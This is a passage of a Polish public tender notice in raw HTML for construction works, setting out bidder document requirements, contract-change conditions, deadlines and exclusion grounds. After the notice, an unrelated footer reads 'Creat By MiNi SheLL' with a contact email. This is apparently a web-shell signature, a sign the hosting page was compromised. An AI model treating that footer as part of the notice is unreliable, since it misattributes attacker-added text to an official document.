gwarancyjną o minimalnej wysokości wymaganej dla zamówienia<br/>określonej w cz. XI ust. 1 lit. c.<br/>4) Wykazu robót (załącznik nr 16 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane z załączeniem dowodów określających, czy te roboty zostały<br/>wykonane należycie, przy czym dowodami tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze, Wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>5) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego (załącznik nr 17 do SWZ), w szczególności<br/>odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych czynności oraz<br/>informacją o podstawie dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy Pzp. Przepisy dotyczące<br/>Wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> trony dopuszczają możliwość dokonywania zmian w Umowie. Zmiana Umowy dopuszczalna będzie w granicach<br/>wyznaczonych przepisami ustawy Pzp, a w szczególności:<br/>1. Strony mają prawo do przedłużenia wykonania przedmiotu Umowy o okres trwania przyczyn, z powodu których będzie<br/>zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>a) Jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem<br/>okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą:<br/>- następstwem nieterminowego przekazania terenu budowy, trwającego dłużej niż 7 dni,<br/>- następstwem wstrzymania wykonania robót na wyraźne żądanie Zam.<br/>trwające dłużej niż 7 dni.w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu<br/>zakończenia robót.<br/>b) Zamawiający ma prawo, jeżeli jest to niezbędne do wykonania przedmiotu niniejszej Umowy, polecać Wykonawcy na<br/>piśmie dokonanie zmiany kolejności wykonania robót określonych w uaktualnionym HR<br/>c/Gdy wystąpią niekorzystne warunki atmosf uniemożliwiające prawidłowe wyk. robót bud., w szczególności z powodu<br/>techn.realizacji prac określonych Umową, normami lub innymi przepisami wymagającymi odpowiednich warunków. Za<br/>niekorzystne warunki atmosf. należy rozumieć: intensywne opady deszczu, opady śniegu, panujące ujemne temp. poniżej<br/>minus 15 st Celsjusz, powodujące rozmiękczenie gruntu, uniemożliwiające wykon prac na wysokościach, zmarznięcie<br/>gruntu, a w konsekwencji konieczność przerwania robót.<br/>d) Gdy wystąpi konieczność wyk. robót zam. lub innych robót niezb. oraz udzielenia zamówień dodatk. na zasadach<br/>określonych przepisami ustawy Pzp, które wstrzymują lub opóźniają realizację prze. Umowy, wystąpienia<br/>niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie<br/>niezbędnym do uniknięcia lub usunięcia tych kolizji. Zmiany w tym zakresie mogą spowodować zmianę wynagr. Wyk.,<br/>terminu realizacji zamówienia. Wynagr Wyk zostanie ustalone zgodnie z § 17 Umowy.<br/>e) Gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy adm. państ. do<br/>których są zobowiązane<br/>g) Jeżeli wystąpi brak możliwości wyk. rob z powodu niedopuszczania do ich wykonywania przez uprawniony organ lub<br/>nakazania ich wstrzymania Umowy przypadku „siły wyższej”, przez którą rozumieć się będzie zdarzenie zewn. Za „siłę<br/>wyższą”, warunkującą zmianę Umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe,<br/>zamieszki, strajki, ataki terrorystyczne, huragan, śnieżyca, uderzenia pioruna, gradobicie, epidemie, wojna, strajki, szkody<br/>wyrządzone przez dzikie zwierzęta, odnalezienie niewypałów, niewybuchów lub wykopalisk archeologicznych, katastrofy<br/>lotniczej, protesty ludności; działania osób trzecich uniemożliwiających lub utrudniających realizację) uniemożliwiającej wyk.<br/>przedm. Um.<br/>2. Strony dopuszczają możliwość wprowadzenia Podwyk. w sytuacji, gdy Wyk. nie zadeklarował w ofercie realizacji zadania<br/>przy pomocy Podwy - na zasadach wg.umowy.pozostałe warunki - wg. projektu umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-17 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https:/josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-17 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający uwzględnia podstawy wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz. U. z 2024r., poz. 507 ze zm. dalej „Specustawa”).<br/>Cena oferty stanowi wynagrodzenie ryczałtowe.<br/>1.	Zamawiający nie przewiduje możliwości zawarcia umowy ramowej.<br/>2.	Zamawiający nie przewiduje możliwości udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>3.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>4.	Zamawiający nie przewiduje aukcji elektronicznej.<br/>5.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>6.	Zamawiający żąda wskazania w ofercie przez Wykonawcę tej części zamówienia, odpowiednio do treści postanowień SWZ, której wykonanie zamierza powierzyć podwykonawcom, a także wskazania nazw (firm) podwykonawców na zasoby, których się powołuje w celu spełnienia warunków udziału w postępowaniu.<br/>7.	Zamawiający nie zastrzega możliwości ubiegania się udzielenie zamówienia wyłącznie przez wykonawców o których mowa w art. 94 ustawy Pzp.<br/>8.	Zamawiający nie zastrzega kluczowych zadań do osobistego wykonania przez wykonawcę.<br/>9.	Zamawiający nie dopuszcza możliwości składania ofert w formie katalogów elektronicznych lub dołączenia katalogów elektronicznych.<br/>10.	Zamawiający nie przewiduje możliwości, ani nie wymaga od wykonawców złożenia oferty po odbyciu wizji lokalnej lub sprawdzeniu dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 281 ust. 1 pkt 12 ustawy Pzp. <br/>11.	Zamawiający nie przewiduje rozliczania w walutach obcych.

Creat By MiNi SheLL
Email: jattceo@gmail.com